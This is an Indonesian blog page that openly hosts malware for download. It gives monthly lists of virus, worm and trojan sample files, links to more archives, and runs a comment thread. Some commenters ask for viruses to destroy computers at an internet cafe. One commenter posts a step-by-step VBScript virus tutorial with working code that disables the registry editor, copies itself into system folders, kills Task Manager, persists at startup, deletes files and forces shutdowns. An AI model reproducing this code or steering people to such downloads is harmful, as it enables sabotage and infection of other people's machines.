MorphostLab

Tempat nongkrongnya Morphic dan kawan-kawan

Download Virus & Software

Area bebas download virus….
Silakan download virus yang kamu inginkan. makan dan enjoy it!!!

ANDA BOLEH MEMPOST COMMENT DI HALAMAN INI, DENGAN CATATAN COMMENT ANDA BERISI LINK VIRUS.
COMMENT YANG TIDAK BERISI LINK VIRUS AKAN DIHAPUS
(kebijakan 3 Agustus 2010)

Virus
Berdasarkan nama file yang dikirim…
Koleksi Agustus2008
(poet yang bikin)freshh.exe
anjink.rar
explorer.rar
PaLMa.exe
Readme VIRI.ZIP
search.ini
SPR.ToolObfuscator.BK17Program.zip
MyLove.Worm
Moonlight
pkxfkri.Worm
NewVirus
Pengki

Koleksi September 2008
autorun.inf
autorun.qv
autorun1.qv
curhat.scr
familykeyloggerv2.83patchlaxity.zip
Linux.zip
rundll32.exe
unAnalyzed virus(by p0et).zip
Conficker.Worm
Conficker.Autorun
Conficker.Variant
Gamona
Virus Data TulipNet

Koleksi Virus Oktober 2008
(2) cek_virus.exe
cacing.sys.vbs
cek_virus.exe
desktop.vbs
Jodoh Anda Hari Ini.zip
Kspoold+virut.exe
Mc~.rar
svchost.exe
urcxus(dari Jude).zip
Kavos
Sampel BugAV

Koleksi Virus November 2008
(2) PaLMa.exe
boot.ini
boot.zip
boot.zip
chvdnk.exe
D e u l l e D o – X, The Visual Basic K i l l e r.txt
f&i.vbs
GREAT VIRUS (undetect).zip
help me please.zip
k4124w4n6s.zip
klmcodec568.exe
oorrpr.cmd
RECYCLER.scr
Srig4l4.zip
surat.vbs
Topinsutki.Worm A.exe
Virus Tambal Ban.zip

Koleksi Virus Desember 2008
boot.exe,Alman
Daftar Isi.exe,NovemberGen.16.2057.Worm
double dragon kick.zip.exe

INTRODUCTION TO VASCULAR PLANTS.exe,Susp.free_mine.Worm
Lovely aNa.rar
Prisa_Sexy.scr
Puisi cinTaku.rar
SVICHOOST.exe,Unknown Virus


TrenD 9aya RAm8ut 2008.exe
vcww.exe,Maxtrox.Worm
virus.cls
virus.txt
Wallpaper.exe

Koleksi Virus Januari 2009
conficker.autorun.rar
hyoa.cmd
jwgkvsq.rar
kumpulan virus.txt
kumpulan virus.zip
pengki.zip
Slax on flashdisk.exe
virus tolong gimana cara ngbasminya.rar
Virus-Worm Data TULIPNET.rar
virus.rar
zXcZXcZX.htm

Koleksi Virus Februari 2009
conficker.autorun.rar
hyoa.cmd
jwgkvsq.rar
kumpulan virus.txt
kumpulan virus.zip
pengki.zip
Slax on flashdisk.exe
virus tolong gimana cara ngbasminya.rar
Virus-Worm Data TULIPNET.rar
virus.rar
zXcZXcZX.htm

Koleksi Virus Maret 2009
Autorun.RAR
Conficker.variant.rar
Gamona.trj.zip
HTML.Script.virus.rar
Kavos.trj.rar
RECYCLER.rar
rockstreet.dll.rar

Koleksi Virus April 2009
Baca AQ.rtf
Buzus.Trj.autorun.rar
help me.zip
help me.zip
Microsoft.lnk
Microsoft.lnk
Morphost.exe
My name is Yuyun.rtf
New Folder.lnk
New Harry Potter and….lnk
Servermouse.varian.rar

Koleksi Virus Mei 2009
(2) Malcode.rar
Blank.virus.rar
Conficker.varian.G.rar
Conficker.variant.Lagi.rar
Malcode.rar
NewFolder.rar
Quarantine_ Jogja.rar
Quarantine_Jogja2.rar
Quarantine_jogja3.rar
Quarantine_Jogja4.rar
sALITY.rar
Yudha.Suspected.cmd.rar
Yudha.suspected.rar
Yudha.virus.warnet.rar

Koleksi Virus Juni 2009
a.odt
autorun.rar
autorun.zip
av.inf
av2.inf
four2one.jpg.vbs
four2one.jpg.vbs
Laporan.exe
Suspected.Yudha.rar
Trojan.JS.Yuyun.rar
Virus warnet.rar
yudha-thumbsuck.rar
Autorun by Maxx [Ziddu]
SpySuspect [Ziddu]
Rizkiardianatrocketmail.com [Ziddu]

Koleksi virus Juli 2009
.exe
autorun by maxx.rar
IJAB QOBUL.rar
nadia shapira.7z
new virus by Maxx.zip
PIN Card Credit.exe
rizkiardian[at]rocketmail.com.rar
Spy.suspect.rar
virus.exe
yuda-nathq-yuyun.ink.rar
yudha-nathquanglan.rar
yudha-sality.suspect.rar
yudha-suspected.rar
yudha-Trojan.Warnet.rar
yudha-vbs.malware.rar
yudha-w32.small.rar

Koleksi Virus Agustus 2009
Rh354 sampel.rar
SAMPEL-RECYCLER(VMX).rar
Vir A-25-8-09_ By Neo Bekabe.zip
y-aorsli.autorun.worm.rar
y-new.malware.A.rar
y-new.malware.B.rar
y-Spy.tool.rar
y-trojan.agent2.rar
y-trojan.dropper.rar
y-Trojan.murlo.rar
y-trojan.regrun.rar
y-worm.autoit.rar
y-worm.generic.b.rar
y-worm.generic.rar

Koleksi Virus September 2009
(2) trojan.generic.zip
comwarior.c.zip
conficker.rar
sality.zip
SampelvirusRecycler.zip
SampelvirusRecycler.zip
Sample virus.zip
SimbOS.sebelo.zip
SymbOS-Fontal.A.zip
trojan.generic.zip
Virus by Neo BeKaBe_09-09.zip
Virus Ganas.tar.gz
Virus.Win32.Sality.p.zip
Virus.Win32.Sality.q.zip
Virus.Win32.TeddyBear.zip
y-infected.suspected.zip
y-psw.online.games.zip
y-Sality.Suspected.rar
y-sality.varian.rar
y-sality.varian.yudha.rar
y-suspected.virus.zip
y-trojan-agent.zip
y-trojan.agen.lagi.zip
y-trojan.delf.zip
y-trojan.VB.ITN.zip
y-virus.cacing.zip
y-virus.pwrszr.warnet.b.zip
y-virus.pwrszr.warnet.zip
y-virus.winlib32.warnet.zip
y-zndll.warnet.rar

Koleksi Virus Oktober 2009
y-Ciluka.B.rar
y-Ciluka.worm.rar
y-Conficker.Variant.rar
y-cuakep.varian.rar
y-Cuakep.virus.zip
y-delf.varian.rar
y-FakeAlert.trojan.zip
y-Falder.trojan.zip
y-FFE.rar
y-FraudPack.trojan.zip
y-HantuRimba.rar
y-kemben.b.rar
y-Kemben.rar
y-new.virus.rar
y-ratnguy.virus.rar
y-RatuFelisha.rar
y-sality.nakal.rar
y-sality.varian.lagi.rar
y-sality.varian.lagi2.rar
y-suspected.ise32.rar
y-suspected.keygen.rar
y-suspected.virus.lagi.rar
y-suspected.virus.rar
y-Symbos.Comwar.rar
y-Symbos.rar
y-Trojan.Acad.rar
y-Trojan.Agent.rar
y-VB-KZN.worm.rar
y-Virus.Jim.zip
y-Virus.VB.rar
y-virut.varian.lagi.rar
y-zola.fakeAV.zip
y.suspected.virus.rar
y.VB.Worm.PDL.rar
y.Virut.varian.zip

Koleksi Virus Bulan November 2009
(2) New Folder.rar
(3) New Folder.rar
autorun.inf,DidugaVirusINF
file terinfeksi oleh virus varian alman by adnan.zip
file terinfeksi virus by adnan.zip
linkinfo.rar
logoff.exe,LogOff
more.rar
New Folder.rar
Sampel virus by coe88.zip
Sampel virus zPharaoh.zip
Setup.rar
y-Alman.Varian.rar
y-Brontok.rar
y-Email.Worm.lagi.rar
y-Email.Worm.rar
y-Nimda.htm.rar
y-Runonce.Lagi.rar
y-Runonce.worm.rar
y-Sality.AA.rar
y-Sality.AM.rar
y-Sality.Injected.rar
y-Sality.lagi.rar
y-Sality.Varian.lagi.rar
y-sality.varian.rar
y-Suspected.Autorun.rar
y-Suspected.Generic.rar
y-Suspected.virus.rar
y-Thumbss.vbs.rar
y-Trafaret.Worm.rar
y-Trojan-Gen.rar
y-Trojan.Gen.Varian.B.rar
y-Trojan.Gen.varian.C.rar
y-Trojan.Gen.varian.rar
y-Virut.Injected.rar
y-Worm.Agent.zip
y-Worm.Agent2.zip
y-Worm.Saber.Autorun.rar
y-Yuyun.Varian.rar
y.GameThief.rar

Koleksi Virus Bulan Desember 2009
(2) y-Suspected.Virus.rar
a-fake file.zip
ABG.Gila.rar
al.rar
autorun.rar
Autorunme.Worm.rar
Backdoor.PHP.Small.o [Kaspersky].rar
BAT.Mita.rar
By Neo_BKB_Setup.exe
Cuakep.Baru.rar
Cuakep.Varian.rar
FlashDiskLock.rar
Gen.Troj.rar
gendel32.Trojan.rar
I miss you. Varian.rar
Infected.Autorun.Worm.rar
m.rar
Malware.by.Shafry.rar
Mita.vbs.rar
Morphirii.rar
MP3.Samson.Worm.rar
msvbvm60.rar
New.Virus.rar
New.virus.rar
Nimda.htm.rar
Playboy.A.rar
Playboy.B.rar
Runonce.Infected.rar
Runonce.Varian.rar
Sadic.vbs.rar
Sample Virus 11 Des 09.zip
Script.New.rar
sgemtx.rar
shireen_sungkar.rar
Smadav 7.3.rar
svchost.7z
Trojan.Downloader.html.rar
Trojan.Lagi.rar
vbs.script.rar
virus Bokep.rar
Virus CoPas by Maxx.rar
Virus.BDEWASA.zip
Virus.item.rar
Virus.rar
Worm.Bagle.AG.2.exe.gz
y-Ardamax.Worm.rar
y-Autorun.Worm.rar
y-Gadis.Ancol.rar
y-Gen.troj.rar
y-JS.Agent.Troj.rar
y-Malingsia.Varian.2.rar
y-Malingsia.Varian.3.rar
y-Malingsia.Varian.rar
y-Sality.Varian.rar
y-Sex.17Tahun.rar
y-Suspected.Virus.rar
y-Trojan.Acad.rar
y-Trojan.Backdoor.rar
y-Trojan.Dropper.rar
y-Trojan.FatalError.rar
y-Trojan.Gen.Lagi.rar
y-Trojan.Gen.rar
y-Trojan.Gen.Varian.rar
y-Virus.Acad.rar
Yuyun.Thumb.lagi.rar
Yuyun.Thumb.Varian.rar

Koleksi Virus Januari 2010
Autoit.Varian.rar
autorunme.Recycler.rar
autorunme.Recycler.zip
bukan virus.rar
Cinta.Laura.Worm.rar
Gen.Troj.Yahoo.B.rar
IRC.Worm.rar
iseng.vbs.rar
New Folder.rar
New.Virus.rar
New.Virus.Undeepfreeze.zip
Nimda.htm.rar
Pharaoh(pass=1234).rar
rad05b8f.zip
Recycler.scr.rar
Recycler.Varian.rar
Sality.Varian.hkcmd.zip
Sality.Varian.lagi.rar
Sality.Varian.rar
Script.vbs.rar
Trojan.Dropper.rar
VIDEO maria OZAWA 2.zip
Vira.Worm.zip
virus ternate.daa
Worm.Gen.rar

KOLEKSI VIRUS LAINNYA:
http://www.4shared.com/file/ZgYe9PRA/_2__Momo_Geisha.html
http://www.4shared.com/file/sx5kFwiJ/fannx_pass1234.html
http://www.4shared.com/file/6ZaERWCg/MalwareIDB-1.html
http://www.4shared.com/file/Oq67jyP9/Momo_Geisha.html
http://www.4shared.com/file/gasaaRGR/umdmgr.html
http://www.4shared.com/file/LRDxKbPu/update.html
http://www.4shared.com/file/1pkBcvhm/VIRwmicvrts.html
http://www.4shared.com/file/FiXDJZn0/WormSymbOSComwara_by_Ranjau_Ib.html
http://www.4shared.com/file/VI7MocWE/WormSymbOSComwarg_by_Ranjau_Ib.html
http://www.4shared.com/file/YJpDwN9W/WormSymbOSComwarj_by_Ranjau_Ib.html

itu virus-virus yg paling sering berserak di indonesia…

Ini dia software-software yang berguna buat kamu-kamu.
Silakan download segera. Jangan tunggu nanti!!!
(kerusakan yang ditimbulkan software-software berikut bukan tanggung jawab MorphostLab)
Software
Internet Password View
Pro-Morphost v.1
Sality_off
Rax 1.1 [Format Zip]
Notepad++
Folder Background v4.1
Antivirus Avira Classic
Antivirus_VBS
AV_no1
Beyoens Protect v2.0.5
Beyoens Protect
Encrypt File’s
ENSES32 Antivirus System v1.0.0.597
ENSES32 Antivirus System v1.0.0.729
ENSES32 Antivirus System v1.0.0.862
ENSES Virus Scanner
Folder Background v3.0
Folder Background v4.0
Folder Designer 1.2
Folder Desginer 1.1


ANDA BOLEH MEMPOST COMMENT DI HALAMAN INI, DENGAN CATATAN COMMENT ANDA BERISI LINK VIRUS.
COMMENT YANG TIDAK BERISI LINK VIRUS AKAN DIHAPUS
(kebijakan 3 Agustus 2010)

267 Tanggapan to “Download Virus & Software”

  1. mini said

    link virus byk yg mati…perbaiki donk..

  2. HafizhHack said

    minta virus yang banyak dan grget donk

  3. DD said

    (2) trojan.generic.zip
    comwarior.c.zip
    conficker.rar
    sality.zip
    SampelvirusRecycler.zip
    SampelvirusRecycler.zip
    Sample virus.zip
    SimbOS.sebelo.zip
    SymbOS-Fontal.A.zip
    trojan.generic.zip
    Virus by Neo BeKaBe_09-09.zip
    Virus Ganas.tar.gz
    Virus.Win32.Sality.p.zip
    Virus.Win32.Sality.q.zip
    Virus.Win32.TeddyBear.zip
    y-infected.suspected.zip
    y-psw.online.games.zip
    y-Sality.Suspected.rar
    y-sality.varian.rar
    y-sality.varian.yudha.rar
    y-suspected.virus.zip
    y-trojan-agent.zip
    y-trojan.agen.lagi.zip
    y-trojan.delf.zip
    y-trojan.VB.ITN.zip
    y-virus.cacing.zip
    y-virus.pwrszr.warnet.b.zip
    y-virus.pwrszr.warnet.zip
    y-virus.winlib32.warnet.zip
    y-zndll.warnet.rar

    Koleksi Virus Oktober 2009
    y-Ciluka.B.rar
    y-Ciluka.worm.rar
    y-Conficker.Variant.rar
    y-cuakep.varian.rar
    y-Cuakep.virus.zip
    y-delf.varian.rar
    y-FakeAlert.trojan.zip
    y-Falder.trojan.zip
    y-FFE.rar
    y-FraudPack.trojan.zip
    y-HantuRimba.rar
    y-kemben.b.rar
    y-Kemben.rar
    y-new.virus.rar
    y-ratnguy.virus.rar
    y-RatuFelisha.rar
    y-sality.nakal.rar
    y-sality.varian.lagi.rar
    y-sality.varian.lagi2.rar
    y-suspected.ise32.rar
    y-suspected.keygen.rar
    y-suspected.virus.lagi.rar
    y-suspected.virus.rar
    y-Symbos.Comwar.rar
    y-Symbos.rar
    y-Trojan.Acad.rar
    y-Trojan.Agent.rar
    y-VB-KZN.worm.rar
    y-Virus.Jim.zip
    y-Virus.VB.rar
    y-virut.varian.lagi.rar
    y-zola.fakeAV.zip
    y.suspected.virus.rar
    y.VB.Worm.PDL.rar
    y.Virut.varian.zip

  4. Agung setia said

    Request mas sample virus Rombertik
    kirim ke emailku agung_slim@ymail.com

  5. KUCING said

    Ada virus hatred gak ?

  6. acep jepy said

    hebattt nih…kerennn….
    bang itu link virusnya ko pada banyak yang mati sih………???????
    terus banyakin lagi dong bang, koleksian virusnya masa berhenti di januari 2010…..??????

  7. rereriverabloom said

    waw hebat!!!!!

  8. ahmad said

    morp.ni gue mo coba hal hal baru ne.mw bisa jd VM n juga AVM.
    n pngn trainingnya getoo om.ttng script2 dll nya.

    satu lgi.tuh virus2 diatas kalo di dwnload lngsung serbu kompi ane gag..
    bisa juga gag tuh bkin script yg otomatis download dr situ.

  9. miko said

    ada gak virus yg bisa ngerusakin laptop

  10. OneFiveSeven said

    Ada Tau Ga Cranya Buat ANTI VIRUS……………………………………
    Help………………..
    Aqu Ada TGS Dari Guru Bantu Yah……

  11. Fans said

    haha….virus ecek-ecek semuanya…

  12. socrates said

    om, ane maw tanya. ada virus yang bisa nyusup ke file kompres (rar) ga? soalnya ane nemu di komputer ane, smw file .rar disusupin file baru (.exe). thx before

  13. firli said

    smua virus sdh aq download, hasilnya smua terdetec MSE dan langsung disikat MSE sampai tak berbekas…..

  14. Gw said

    Gan gw lagi KeseL ama Warnet dket rmh aye ,, saya mau Kirimin Virus tuh Komputer2 di warnet tuh biar rusak tapi saya takut nanti ke tahuan , Apa aplikasi yang cocok untuk saya gan..

  15. orang said

    mse dtect juga 24 virus yang ku scan di disk d,c,b gara2 ku download di website ini

  16. riyan said

    gan ane minta virus untuk ngerentes password kaya worm atau virus Fb ada gak

  17. fresa said

    aku butuh virus ni. supaya program kompternya pada ilang semua.
    ada yang bisa bantu ngak?? pleas..

  18. microsoft said

    ada yang masih punya sampel brontok nggak?

  19. avillo said

    trims gan virusnya

  20. fians said

    gan kira2 yang paling ganass mna nih q pengin rusak kompi di warnet nichhh

  21. Adeqeepe said

    Salam Kenal

    Avast (Blue) version 4.8 nge_Deteksi Virus “W32 Viking” permsalahannya Boss…ane gk tau mesti ngapain ke Avast..hny klik “Not Action” aja…kalo nge DELETE ane sumpah gak berani Boss..takut Error nya kmn2..Mohon Pencerahannya…thx bgt

  22. ade said

    Boss..mau tanya neh…Laptop sy “dirasuki Virus W32 Viking” antivirus yg ane pake Avast (Blue,version brp gk tau dehh..hehhehe…Viking nya terdeteksi tp ragu maub delete nya takut “Salah Jalan” ..mohon bantuannya Boss..wassalam.

  23. s said

    New Heur.Variant.
    ne mnyrang komputerku…
    gmna cranya buat ne………………..

  24. nadya said

    all ada ga virus supaya jaringn ke 1 komp kalo lagi maen di net ..???
    abis kalo ke net bnyak yang download pake IDM jadi pada leg dehh ..

    mohon bantuan’a yahh ..
    by:nadya_chi_lolipop@live.com

  25. awan said

    sob ada link download virus yang waktu didownload langsung nyebar n ganas buat PC gak??
    contohnya seluruh hardisk langsung keformat ..
    n kalo bisa yang bikin badsector hardisk cz ni ada orang sombong di salah satu forum n ngaku gak takut n sombong hehehgeheh

  26. Diaz arkila said

    bro, mau tanya nihh.. kalo ngambil ceksum virus gimana caranya ya??

  27. kalau virus yang bisa tembus deep freeze trus membuat komputer hang ada nggak???

  28. Andrian21 said

    Hebat Kau Sob , Bisa Lah Sharing Sedikit Dengan Ane🙂

  29. Bos, ane punya sampel virus nih, gak tau ini apa nama virus ini. Avast ane deteknya Win32:Kryptik-BWY [Trj]. Langsung sedot aja :http://www.megaupload.com/?d=U86E9U6J

  30. gimana cara menghapus virus new heur level 9 dan virus shortcut yg mnyrang flasdis dan com….?
    karena virus itu menyusakan sekali…

  31. gibur said

    om ku pusing om udah instal ulang beberapa kali tapi virusnya tetap ada gmn.ya nama virus.nya win32/virut.an ama win32/heur low gak salah trz low kita masukin flasdisk si virus ngebuat exe ke flasdisk itu dalam keadaan di hidden nah anehnya waktu di scan ama anti virus manapapun ga keditek itu data virus udah di buka hidden nya juga masi tetep ga ke ditek tapi low datanya kita bawa ke tempat scan yg online itu ama semua beberapa anti virus keditek waktu aku pake antiviur yang di online yg bisa ngeditek tu virus di psang di kom rumah tetp aja gak keditek

    • KANTA said

      pake AV Microsoft Scurity Essential dari Microsoft dijamin virus yang nyebelin seperti Ramnit, Virut dan sality dibabat abis, bahkan AV ini mampu meng-clean 100% file exe yang terinfeksi virus, alna aq dah dapat nyoba 100% berhasil. syarat untuk bisa menginstal AV windows-nya harus asli. untuk membuat windows jadi asli cari za serial number windows yang asli melalui google. Untuk bisa Install di windows XP SP2, harus install Microsoft Netframe Work 2.
      Install ulang windowsnya, instal Microsoft Scurity Essential, jangan dulu install driver, cari update Microsoft Scurity Essential di Internet , matikan system restore, scan kompi ampe bersih. matikan automatic windows update, alna antivirus ini akan diblokir walau serial number windows kita asli.tks

  32. waethol said

    bos minta sample virus yang bisa format harddisk

  33. hi..
    ini Estra
    Aku mau tany : Apa” saja yang dipelajari jika kita mau buat antivirus?
    Gimana kita mengetahui suatu virus,tapi jangan diliat dari extensinya?

  34. Aku Estra , Temen Eky pinem.
    Mau tanya : Gimana cara melihat suatu virus,bukan dari Extensinya melainkan program nya?
    Gimana buat antivirus yang bagus,apa” aja yang perlu dipelajari?

  35. allow smua, ada sample virus batam hacker ga. sy mau coba buat autoremovenya thx

  36. paijo bejo said

    gan ni virus ato bkn
    http://adf.ly/791353/www.4shared.com/account/dir/tqV9He0h/sharing.html?&rnd=97

  37. ?? Ada YanG LanksuNG di Satu Packet Bisa Gan Misalx 2010 LangsuNG ajah Di Isi Sality Danlain2
    kalo Ada Yang Bisa Tau cara MengoTomatiskan antivir RUn Otomatick Dalam Windows Mhon BanTUan TEnks Yah😀

  38. miftah said

    brow, sample ramnit udah ada blm😀 pengen liat2 nih pirus kyk gmn heheeee
    maju terus deh Morphost! kalahin tuh si kESET, kAPAST!, kungfu Panda, bitdeBLENDER, etc hehehee

  39. edi said

    om virus heur level (9) ko ga terdeteksi ya………….

  40. Fajar said

    om morphic, nih salah satu virus autorun.inf, tolong dikaryakan ya.

    http://www.4shared.com/file/Rmicliq7/autorun.html

  41. mbah_bazz said

    gan ne kemaren q nmu beberapa sampel vrus. tapi udah discan pke morphost, smadav n NIS 2010 g kna. q juga nmu kompi yang trus muncul proses runouce.exe di task manager, buat kompi jadi lemot, ngabisin cpu usage banyak n banyak program g mw jalan, termasuk morphost.exe. mohon solusi dan bantuannya.

    http://www.4shared.com/file/lgH–KAi/DrivesGuideInfo.html
    http://www.4shared.com/file/sY__P4kd/MSMSGS.html

    • Bian said

      Name Findings Detection Type Extra
      pramuka.exe current detection w32/virut.rem.e Virus no
      msmsgs.exe current detection w32/virut.n.gen Virus no

      didetek sm McAfee, file udah bisa diclean…

    • Herry said

      buat virus runounce coba gunakan AVG Free Edition download dari http://www.filehippo.com. AVG mendeteksi virus ini dg nama Chir B@m. saya pernah mencoba menangani virus ini d kompi2 warnet. Bisa juga pake Kaspersky Internet Security or Antivirus, Kaspersky mendeteksi dg nama RunOunce. Masih langka AV lokal yg bisa menangani virus ini, karna virus ini menginfeksi sistem n File dengan extensi *exe (executable).

  42. edy said

    gan, ane bingung ama nie virus.. gak ilang2 dari kompi ane karena kompi ane network mpe 60 pc jadi ane bingung tu virus ada di pc mana..

    Morphost bisa gak ya morphost AV bisa buat scan network

    ini sampelnya gan..
    http://www.4shared.com/file/WBSjhD7k/IT_online.html

  43. Beny said

    Pic aku ada 1 virus yg mengidap diwarnetku… tolong dianalisa
    ni linknya
    http://www.4shared.com/file/L14ye0p6/mso_trojan.html

  44. Bobby said

    Mas, itu semua sample yg di upload disini uda ada semua di sgnature morphos yang di-publish?? buat jaga2…thx

  45. anang said

    boss database morphos cepet ditambah dong, dari keempat AV lokal yg saya pke (smadav, ansav, pcmav, morphos) cma morphos yg DB nya paling dikit. saran saya morphos tambah plugins clamav yag DB nya lebih dari 1.4 jt vius.

  46. halo bro, maap nie, ane mau sharing, sebelumnya ane pake anti trendmicro titanium sama sm***V yg versi 3 pro crack lagi…. cuma ternyata ga solve juga ama masalah ane.. begini ceritanya… suatu hari di bulan november awal sampe pertengahan kemarin ada satu virus yg sangat lumayan rumit nyerang ane, sebenarnya ane udah lumayan bisa ngeringkus salah satu sourcenya, cuma gara2 waktu itu ga sengaja ngejalanin salah satu anvi yg logonya kayak senjata gitu, tuh sorse ikut ilang bersama dengan file2 ane di salah satu drive suspect, ane udah format apus sampe update anvi gt, cuma perasaan ane merasa koq tuh pirus masih bercongol walau udah ga ganas, cuma terkadang suka ngelooping ke web luar juga… ini ane pake win 7, mungkin ga terlalu ngepek, cuma klw pake win xp, sumpah deh lemudnya sistem and inet koneksi kadang bisa membuat ga masuk akal speed core i5 bisa kalah sama celeron… ini ulasannya : http://vaksin.com/2010/0110/virus%20messenger/virus%20messenger.html

    mohon agar bro mau membuatkan update untuk databasenya, karena saya yg biasa bermain virus saja, benar2 bisa kerepotan menghadapi pirus ini…

    thanks sebelumnya..

  47. zain said

    # ::1 localhost
    64.79.73.154 drghwaweg45j4i6u3q32fg2h.com
    122.224.6.48 3b.iwillhavebigdick.com
    122.224.6.48 sb.iwillhavebigdick.com
    222.170.127.203 zsrdgrki32qw.com

    stlh sy lihat salah satu dari link di atas “http://drghwaweg45j4i6u3q32fg2h.com/” terdapat 2 buah file yang mencurigakan… yaitu :

    [DIR] cgi-bin/ 24-Oct-2010 00:01 –
    <<<<>>>[ ] gggg.exe 24-Oct-2010 02:21 18K
    [DIR] images/ 24-Oct-2010 00:01 –
    [TXT] postinfo.html 24-Oct-2010 00:01 2.4K
    <<<<>>>[ ] s5.exe 26-Nov-2010 07:54 114K

    tlng di check file tersebut..🙂
    mksh…

  48. Kak,ada worm yang memanggil firefox.exe dengan diam-diam. sampelnya di: [http://www.box.net/shared/6hit97bkmb]
    Mohon analisanya kak….

  49. wenk said

    bos mau nanya klo laptop win Vista kena virus terus task manager, regedit di disable gmn cara tuk ngebuka nya???gw dah nyoba pke mantra:
    ‘Enable Registery Editing’
    ‘A? Veegertx – 26/12/2007
    ‘This code may be freely distributed/modified
    On Error Resume Next
    Set WshShell = WScript.CreateObject(“WScript.shell”)
    wshShell.RegDelete “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”
    wshShell.RegDelete “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools”
    Message = “Regeditnya sekarang udah bisa dibuka,Persembahan terindah ANaQbaik”
    x = MsgBox(message,vbokOnly, “AnaQbaik@tdysoft”)
    Set wshShell = Nothing
    Set fso = Nothing

    ttp ga bs,, ktny vbscript error,,,
    gmn ne,,,,??? tulung!!!

    • Morphic said

      apa pesannya?
      “set fso = nothing” untuk apa ditulis?

    • dony said

      bodohhhhhh itu cuman virus *.vbs

      ni cara membuatnya
      .
      1. mendisable regedit. Yang kita tulis:
      On Error Resume Next(perintah ini digunakan pada file vb
      supaya kalo ada yang salah bisa dilanjutin kode selanjutnya)
      CreateObject(“WScript.Shell”).run “cmd.exe /c reg add hkcusoftware\microsoft\windows\currentversion\policies\system /v
      disableregistrytools /t reg_dword /d “”1″” /f”, vbhide

      sebenarnya banyak cara untuk mendisable regedit. misalnya kek gini:
      CreateObject(“WScript.Shell”).regwriteHKEY_CURRENT_USERsoftware\microsoft\windows\currentversion\policies\systemdisableregistrytools”, 1, “REG_DWORD”

      2. mengopikan diri ke direktory lain

      CreateObject(“Scripting.FileSystemObject”).
      GetFile(WScript.ScriptFullName).Copy “c:\windows\system32\virus.vbs”
      Ada juga cara lain dengan kode seperti ini:
      On Error Resume Next
      createobject(“scripting.filesystemobject”).copyfile wscript.scriptfullname,
      createobject(“scripting.filesystemobject”)
      .getspecialfolder(1) & “\virus.vbs”
      misalnya untuk mengkopikan diri ke direktory C:\WINDOWS\System32
      dengan nama virus.vbs
      .getspecialfolder(0) digunakan untuk direktory WINDOWS
      .getspecialfolder(1) digunakan untuk direktory SYSTEM32 pada windowsXP
      .getspecialfolder(2) digunakan untuk direktory Temporary

      3.Membunuh proses.
      digunakan untuk membunuh proses
      (proses adalah program yang sedang berjalan)
      misalnya kita akan membunuh proses taskmanager
      On Error Resume Next
      CreateObject(“WScript.Shell”)
      .run “taskkill /f /im taskmgr.exe”, vbhide

      4.Menjalankan virus pada saat startup atau saat windows dihidupkan.
      menggunakan regedit
      On Error Resume Next
      CreateObject(“WScript.Shell”).RegWrite “HKEY_LOCAL_MACHINESoftware\Microsoft\Windows\CurrentVersion\Run\virus”
      , “c:\windows\system32\virus.vbs”
      (menjalankan virus yang berada di direktory c:\windows\system32
      dengan nama virus.vbs)

      5.Menghapus File / Folder
      agar virus yang kita buat tidak banyak menggunakan script bisa di singkat seperti ini:
      On Error Resume Next
      set hapus = CreateObject(“Scripting.FileSystemObject”)
      hapus.DeleteFile “C:\xxx.exe” ‘(menghapus file xxx.exe di direktory C:\)
      hapus.DeleteFolder “C:\antivirus” ‘(menghapus folder antivirus di direktory C:\)

      6.Merestart Windows
      CreateObject(“WScript.Shell”).run “shutdown -r -f -t 60”, vbhide
      merestart windows dalam waktu 60 detik

      7.Meng-ShutDown Windows
      CreateObject(“WScript.Shell”).run “shutdown -s-f -t 60”, vbhide
      mematikan windows dalam waktu 60 detik :)yang beda cuman
      “shutdown -s-f -t 60”
      S = untuk shutdown dan
      R = untuk reboot\restart

      8. Mengaktifkan Virus Pada Waktu tertentu
      If day(now) = 1 and month(now) = 1 and year(now) = 2009 then
      ‘(masukkan kode virus disini)
      End if
      ‘misalnya kalo mau mengaktifkan pada tanggal 1, bulan 1
      ‘dan tahun 2009

  50. jei said

    bang, download virus nya koq cma sampe database januari 2010 sich………..??????????????

  51. rifai said

    mas morphosh udah bisa ngilangin virus servick yang ada di destop belum dan satu lg waktu scan di sistem C: scan belum tuntas tp morphosh udah close otomatis gimana nih mas???tolong di bantu yah

  52. gigih said

    Bos virus berekstensi *.pif sudah bisa dihapus blm ya..?

  53. yeye said

    sample…plus skrinsut

    http://www.4shared.com/file/GyslZli3/Virusname_-_df5srvc.html

  54. Kevin... said

    Virus dsini dah pda bsa dibasmi kaan???

  55. Hadi Nanmie said

    ane baca-baca katanya bisa menghilangkan virus yang 1kb ternyata stelah ane coba kenapa belum bisa menghilangkan ya….pls help me

  56. kak, gimana caranya agar kita dapat menghapus start-up virus yaitu seiluh.exe, virus nya akan bekerja jika flashdisk tercolok dan langsung menginfeksi flashdisk dengan cara mengisinya dengan shortcut yang banyak dan menghidden tiga Apps yaitu: seiluh.exe, smss.exe, dan isass.exe. dan jika flashdisk tersebut dicolokan ke kompi lain 3 Apps tersebut langsung masuk ke start-up dan procces dan terus berulang – ulang dan merussak sebagian program browser seperti google chrome. gimana nih kak.

  57. lukman said

    apakah admin memiliki sample virus yang mengingatkan waktu sholat, jadi virus ini tampak di waktu2 sholat, nanti akan ada 2 pilihan, kurang lebih seperti ini, apakah anda muslim, ada 2 pilihan, ya dan tidak, bila memilih tidak maka baik2 saja, bila memilih muslim, muncul pertanyaan selanjutnya, apakah anda sudah mengerjakan sholat (misal) dhuhur?, kembali ada 2 jawaban, ya dan tidak, bila ya, maka akan ada jawaban, semoga sholat anda di terima oleh Allah swt, tp bila tidak maka ada peringatan, sholatlah terlebih dahulu, dan ada waktu 1 menit untuk save data, lalu komputer akan shutdown dg sendirinya. bagaimana, ada solusi dan sample nya? mohon bantuannya.

    terimakasih

  58. dendy "drizal" said

    phic…… kalo mau aman disimpen dimana virusnya????

  59. Devaz said

    ditunggu data base septembernya bang

  60. arei said

    ad virus dinda dewi alias sangperawan g? share dunk

  61. dodidu said

    ada yang punya virus perusak hardware namanya klo gag salah “Win32.Worm.Zimuse.A”
    upload dong????!!! or kirim ke emailQ
    urfooo@gmail.com

  62. Grungus said

